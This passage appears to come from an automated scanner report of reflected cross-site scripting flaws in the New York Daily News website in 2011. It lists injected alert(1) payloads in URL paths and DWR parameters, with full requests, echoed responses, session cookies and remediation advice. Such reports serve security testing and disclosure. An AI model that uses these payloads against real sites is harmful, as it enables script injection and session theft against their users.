Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:32 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70089
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47dcb'%3balert(1)//ac42f972293 was submitted in the REST URL parameter 3. This input was echoed as 47dcb';alert(1)//ac42f972293 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/weather/index.html47dcb'%3balert(1)//ac42f972293 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:51 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70089
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c46f3'%3balert(1)//e3378de6d1 was submitted in the REST URL parameter 1. This input was echoed as c46f3';alert(1)//e3378de6d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydnc46f3'%3balert(1)//e3378de6d1/content/protected/userAccount.jsp HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:25:38 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70101
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91bf9'%3balert(1)//a54051b6ae1 was submitted in the REST URL parameter 1. This input was echoed as 91bf9';alert(1)//a54051b6ae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn91bf9'%3balert(1)//a54051b6ae1/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:24:39 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70148
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4694e'%3balert(1)//8c2d8cbf93b639449 was submitted in the REST URL parameter 1. This input was echoed as 4694e';alert(1)//8c2d8cbf93b639449 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn4694e'%3balert(1)//8c2d8cbf93b639449/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:25:08 GMT
Server: Apache
Keep-Alive: timeout=3, max=979
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70270
The value of the batchId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebbf0'-alert(1)-'bf834dc50748ef7b2 was submitted in the batchId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0ebbf0'-alert(1)-'bf834dc50748ef7b2 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Too hot for TV: top banned Super Bowl commercials";s0.url="h ...[SNIP]... ;";s9.url="http://www.nydailynews.com/entertainment/tv/2011/02/07/2011-02-07_kim_kardashian_w_magazine_photos_spoofed_on_saturday_night_live_by_host_dana_car.html"; dwr.engine._remoteHandleCallback('0ebbf0'-alert(1)-'bf834dc50748ef7b2','0',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);
The value of the c0-id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5711f'-alert(1)-'5cdf81443951987e2 was submitted in the c0-id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=05711f'-alert(1)-'5cdf81443951987e2&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Too hot for TV: top banned Super Bowl commercials";s0.url="h ...[SNIP]... 9.url="http://www.nydailynews.com/entertainment/tv/2011/02/07/2011-02-07_kim_kardashian_w_magazine_photos_spoofed_on_saturday_night_live_by_host_dana_car.html"; dwr.engine._remoteHandleCallback('0','05711f'-alert(1)-'5cdf81443951987e2',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);
The value of the c0-methodName request parameter is copied into the HTML document as plain text between tags. The payload c60b8<script>alert(1)</script>7359c8d2c7d49e1fd was submitted in the c0-methodName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesListsc60b8<script>alert(1)</script>7359c8d2c7d49e1fd&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
The value of the c0-scriptName request parameter is copied into the HTML document as plain text between tags. The payload f8dd1<script>alert(1)</script>58a2a5a85dbc0e420 was submitted in the c0-scriptName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStoriesf8dd1<script>alert(1)</script>58a2a5a85dbc0e420&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
//#DWR-REPLY if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesf8dd1<script>alert(1)</script>58a2a5a85dbc0e420' }, '0'); else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesf8dd1<script> ...[SNIP]...
The value of the callCount request parameter is copied into the HTML document as plain text between tags. The payload c3f74<script>alert(1)</script>fae2bb699717cccb5 was submitted in the callCount parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1c3f74<script>alert(1)</script>fae2bb699717cccb5&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
//#DWR-REPLY if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 1c3f74<script>alert(1)</script>fae2bb699717cccb5' }); else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 1c3f74< ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de454'%3balert(1)//ad63a129e48 was submitted in the REST URL parameter 1. This input was echoed as de454';alert(1)//ad63a129e48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydnde454'%3balert(1)//ad63a129e48/dwr/engine.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:32:29 GMT
Server: Apache
Keep-Alive: timeout=3, max=990
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70209
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81635'%3balert(1)//3f6525a37d1 was submitted in the REST URL parameter 1. This input was echoed as 81635';alert(1)//3f6525a37d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn81635'%3balert(1)//3f6525a37d1/dwr/interface/mostEmailedStories.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:32:37 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70231
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee3e3<script>alert(1)</script>1bc1be80b29 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nydn/dwr/interface/mostEmailedStories.jsee3e3<script>alert(1)</script>1bc1be80b29 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e272c'%3balert(1)//496b14c059d was submitted in the REST URL parameter 1. This input was echoed as e272c';alert(1)//496b14c059d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
